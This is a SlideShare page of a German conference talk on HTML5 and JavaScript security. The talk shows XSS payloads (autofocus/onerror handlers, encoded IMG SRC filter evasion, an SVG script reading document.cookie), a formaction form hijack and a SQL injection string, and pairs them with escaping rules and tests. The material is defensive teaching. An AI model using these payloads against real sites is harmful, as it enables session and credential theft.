Securitybit.ly/HTML5SecInteraktive Version der Präsentation!Created by Johannes Hoppe
JohannesHoppe.debit.ly/HTML5SecInteraktive Version der Präsentation!
ZielAngriffsvektoren aufzeigen.Strategien besprechen.Mehr nicht!
FeaturesNeue Angriffsvektoren
Ein FormularUsername:Password:Login<form id="login" action="#">Username: <input type="text" name="username">Password: <inp...
FormactionUsername:Password:LoginKlick mich!<form id="login" action="#">Username: <input type="text" name="username">Passw...
SVGPresto, WebKit, Gecko und sogar Trident 9<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" width="40" height...
SVGkann JavaScript enthalten!Test<?xmlversion="1.0"?><svgxmlns="http://www.w3.org/2000/svg"width="200"height="50"><defs><s...
Business as usualHTML5 es ist auch nicht schlimmer als HTML 4» http://html5sec.org
XSSEingeschleuster JavaScript-Code
Oldies but Goldiesindex.html?message=Daten gespeichertindex.html?message=<script>alert(XSS)</script><script>var message = ...
Eval everywhereEval is evil» Demo<!-- Self-executing onFocus event via autoFocus --><input onfocus="alert(XSS onfocus)" au...
OWASPOpen Web Application Security ProjectXSS Filter Evasion Cheat Sheet<!-- Long UTF-8 Unicode encoding without semicolon...
XSS Vorbeugen
1.Hier sollten dynamischeDaten niemals verwendet werden<script> </script><!-- HIER --><div HIER="test"/><HIER href="test" ...
2.HTML escapedynamic data& → &amp;< → &lt;> → &gt;" → &quot; → &apos; / '<div>HTML ESCAPE</div>
Testen?function htmlEncode(input) {// jquery.text == document.createTextNodereturn ($(<div/>).text(input).html());}var sav...
Testen!describe("saveFormat", function () {var original = {0} - {1} - {2};it("should replace placeholders", function () {v...
Testfinished in 0.004s••No try/catchJasmine 1.3.1 revision 1354556913Passing2specssaveFormatshould replace placeholderssho...
Moment...describe("saveFormat", function () {var original = <a title="{0}">Test</a>;it("should replace quotes", function (...
Richtig testen!finished in 0.005sxNo try/catchJasmine 1.3.1 revision 1354556913Failing1spec1spec|1 failingsaveFormat shoul...
3.Attribute escapedynamic dataa-z A-Z 0-9 → immun, . - _ → immunRest → &#xHH;<div attr="ATTRIBUTE ESCAPE"></div><!-- NIEMA...
4. DO NOTJavaScript escapedynamic dataHTML parser runs before the JavaScript parser!you are doing it wrong
Das hier ist AlltagUserList.cshtml / Kendo UI Template# if(ID != 0) { #<a href="javascript:DialogManager.ShowPartialDialog...
?Offensichtlich läuft beim Umgangmit Daten etwas prinzipiell falsch!
Storage
Egalob Cookiesob Session Storageob Local Storageob WebSQLdie Daten sind nicht vertrauenswürdig!
Resident XSSrichtig fies!
Vertraulichen Informationengehören in die SERVER-Session!
Session Storage bevorzugen!
WebSQLSQL Injection:Prepared Statement:executeSql("SELECT foo FROM bar WHERE value=" + value);executeSql("SELECT foo FROM ...
Kommunikation
Mashups!define([jquery, knockout,knockout.mapping, domReady!], function ($, ko, mapping) {var url =http://search.twitter.c...
Loading...
JSONJSON with Padding{"hello": "world"}<script></script><script src="http://search.twitter.com/search.json?q=%23dnc13&call...
JSONP
SOPSame origin policy → Not macht erfinderisch (JSONP)CORSCross-Origin Resource Sharing → Access-Control-Allow-Origin: *We...
JS-ReconShell of the Future
Intranet == Internet
Danke!blog.johanneshoppe.de
» Sicherheit von Web-Anwendungen
2013-06-25 - HTML5 & JavaScript Security
2013-06-25 - HTML5 & JavaScript Security
Upcoming SlideShare
Loading in...5
×

2013-06-25 - HTML5 & JavaScript Security

716

Published on

Sie kennen die bekannten Angriffsvektoren wie SQL-Injections oder XSS. Ihre Anwendung ist sicher. Ist Sie das wirklich? Auch wenn Sie in Ihrer Webanwendung kein HTML5 einsetzen, die Browser sind bereit! Kennen Sie alle neuen Markups? Haben Sie bereits die Potentiale von Cross Origin Requests, WebSockets oder Local Storage auf dem Radar? Lernen Sie neue Gefahrenpotentiale kennen, die durch die Unterstützung von HTML5 und dessen APIs entstanden sind. - See more at: http://www.developer-week.de/Programm/Veranstaltung/(event)/11133#sthash.ZRPweawl.dpuf

Published in: Technology, Design
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
716
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
12
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

2013-06-25 - HTML5 & JavaScript Security

  1. 1. Securitybit.ly/HTML5SecInteraktive Version der Präsentation!Created by Johannes Hoppe
  2. 2. JohannesHoppe.debit.ly/HTML5SecInteraktive Version der Präsentation!
  3. 3. ZielAngriffsvektoren aufzeigen.Strategien besprechen.Mehr nicht!
  4. 4. FeaturesNeue Angriffsvektoren
  5. 5. Ein FormularUsername:Password:Login<form id="login" action="#">Username: <input type="text" name="username">Password: <input type="password" name="password"><input type="submit" value="Login"></form>
  6. 6. FormactionUsername:Password:LoginKlick mich!<form id="login" action="#">Username: <input type="text" name="username">Password: <input type="password" name="password"><input type="submit" value="Login"></form><button type="submit" form="login" formaction="http://example.org">Klick mich!</button>
  7. 7. SVGPresto, WebKit, Gecko und sogar Trident 9<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" width="40" height="40"><circle cx="20" cy="20" r="15" fill="yellow" stroke="black"/><circle cx="15" cy="15" r="2" fill="black" stroke="black"/><circle cx="25" cy="15" r="2" fill="black" stroke="black"/><path d="M 13 26 A 5 3 0 0 0 27 26" stroke="black" fill="none" stroke-width="2"/></svg>
  8. 8. SVGkann JavaScript enthalten!Test<?xmlversion="1.0"?><svgxmlns="http://www.w3.org/2000/svg"width="200"height="50"><defs><style> </style></defs><circlecx="20"cy="20"r="15"fill="yellow"stroke="black"/><circlecx="15"cy="15"r="2"fill="black"stroke="black"/><circlecx="25"cy="15"r="2"fill="black"stroke="black"/><pathd="M1326A530002726"stroke="black"fill="none"stroke-width="2"transform="rotate(180,20,28)"/><textx="11"y="50"id="display">Test</text><script></script></svg><![CDATA[text{font-size:6pt;}]]>alert(document.cookie);document.getElementById(display).textContent=document.cookie;
  9. 9. Business as usualHTML5 es ist auch nicht schlimmer als HTML 4» http://html5sec.org
  10. 10. XSSEingeschleuster JavaScript-Code
  11. 11. Oldies but Goldiesindex.html?message=Daten gespeichertindex.html?message=<script>alert(XSS)</script><script>var message = $.url().param(message);if (message) {Notifier.success(message);}</script>
  12. 12. Eval everywhereEval is evil» Demo<!-- Self-executing onFocus event via autoFocus --><input onfocus="alert(XSS onfocus)" autofocus><!-- Video OnError --><video><source onerror="javascript:alert(XSS onerror)"></video><!-- Presto only: Form surveillance --><form id=test onforminput=alert(XSS onforminput)><input></form><button form=test onformchange=alert(XSS onformchange)>X</button>1 2 3
  13. 13. OWASPOpen Web Application Security ProjectXSS Filter Evasion Cheat Sheet<!-- Long UTF-8 Unicode encoding without semicolons --><IMG SRC="&#34&#32&#111&#110&#101&#114&#114&#111&#114&#61&#34&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59">» Old IE Demo
  14. 14. XSS Vorbeugen
  15. 15. 1.Hier sollten dynamischeDaten niemals verwendet werden<script> </script><!-- HIER --><div HIER="test"/><HIER href="test" /><style> </style>HIERHIER
  16. 16. 2.HTML escapedynamic data& → &amp;< → &lt;> → &gt;" → &quot; → &apos; / '<div>HTML ESCAPE</div>
  17. 17. Testen?function htmlEncode(input) {// jquery.text == document.createTextNodereturn ($(<div/>).text(input).html());}var saveFormat = function () {var args = Array.prototype.slice.call(arguments);var txt = args.shift();$.each(args, function (i, item) {item = htmlEncode(item);txt = txt.replace("{" + i + "}", item);});return txt;};
  18. 18. Testen!describe("saveFormat", function () {var original = {0} - {1} - {2};it("should replace placeholders", function () {var expected = A - B - C;var formated = saveFormat(original, A, B, C);expect(formated).toEqual(expected);});it("should encode injected content", function () {var expected = A - &lt;b&gt;TEST&lt;/b&gt; - C;var formated = saveFormat(original, A, <b>TEST</b>, C);expect(formated).toEqual(expected);});});
  19. 19. Testfinished in 0.004s••No try/catchJasmine 1.3.1 revision 1354556913Passing2specssaveFormatshould replace placeholdersshould encode injected content» Demo
  20. 20. Moment...describe("saveFormat", function () {var original = <a title="{0}">Test</a>;it("should replace quotes", function () {var expected = <a title="&quot;">Test</a>;var formated = saveFormat(original, ");expect(formated).toEqual(expected);});});
  21. 21. Richtig testen!finished in 0.005sxNo try/catchJasmine 1.3.1 revision 1354556913Failing1spec1spec|1 failingsaveFormat should replace quotes.Expected <a title=""">Test</a> to equal <atitle="&quot;">Test</a>.Error: Expected <a title=""">Test</a> to equal <a title="&quot;">Test</a>.at new jasmine.ExpectationResult (http://johanneshoppe.github.io/HTML5Securityat null.toEqual (http://johanneshoppe.github.io/HTML5Security/examples/jasmineat null.<anonymous> (http://johanneshoppe.github.io/HTML5Security/examples/jasat jasmine.Block.execute (http://johanneshoppe.github.io/HTML5Security/exampleat jasmine.Queue.next_ (http://johanneshoppe.github.io/HTML5Security/examples/» Demo
  22. 22. 3.Attribute escapedynamic dataa-z A-Z 0-9 → immun, . - _ → immunRest → &#xHH;<div attr="ATTRIBUTE ESCAPE"></div><!-- NIEMALS ohne quotes! --><div attr=ATTRIBUTE ESCAPE></div>
  23. 23. 4. DO NOTJavaScript escapedynamic dataHTML parser runs before the JavaScript parser!you are doing it wrong
  24. 24. Das hier ist AlltagUserList.cshtml / Kendo UI Template# if(ID != 0) { #<a href="javascript:DialogManager.ShowPartialDialog(@Url.Action("UserManagement", "Management"), { userId : #= htmlEncode(ID) # }, {title:#= htmlEncode(Alias) #})"#= htmlEncode(Alias) #</a># } else { ##= htmlEncode(Alias) ## } #
  25. 25. ?Offensichtlich läuft beim Umgangmit Daten etwas prinzipiell falsch!
  26. 26. Storage
  27. 27. Egalob Cookiesob Session Storageob Local Storageob WebSQLdie Daten sind nicht vertrauenswürdig!
  28. 28. Resident XSSrichtig fies!
  29. 29. Vertraulichen Informationengehören in die SERVER-Session!
  30. 30. Session Storage bevorzugen!
  31. 31. WebSQLSQL Injection:Prepared Statement:executeSql("SELECT foo FROM bar WHERE value=" + value);executeSql("SELECT foo FROM bar WHERE value=?", [value]);
  32. 32. Kommunikation
  33. 33. Mashups!define([jquery, knockout,knockout.mapping, domReady!], function ($, ko, mapping) {var url =http://search.twitter.com/search.json?q=%23xss&callback=?;$.getJSON(url).done(function (data) {var viewModel = mapping.fromJS(data);ko.applyBindings(viewModel, $(#tweets).get(0));});});
  34. 34. Loading...
  35. 35. JSONJSON with Padding{"hello": "world"}<script></script><script src="http://search.twitter.com/search.json?q=%23dnc13&callback=foo"></script>var foo = function(json) {$(#output).text(JSON.stringify(json, undefined, 2));};foo({"hello": "world"});» Demo
  36. 36. JSONP
  37. 37. SOPSame origin policy → Not macht erfinderisch (JSONP)CORSCross-Origin Resource Sharing → Access-Control-Allow-Origin: *WebSocketsdo what you want
  38. 38. JS-ReconShell of the Future
  39. 39. Intranet == Internet
  40. 40. Danke!blog.johanneshoppe.de
  41. 41. » Sicherheit von Web-Anwendungen
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×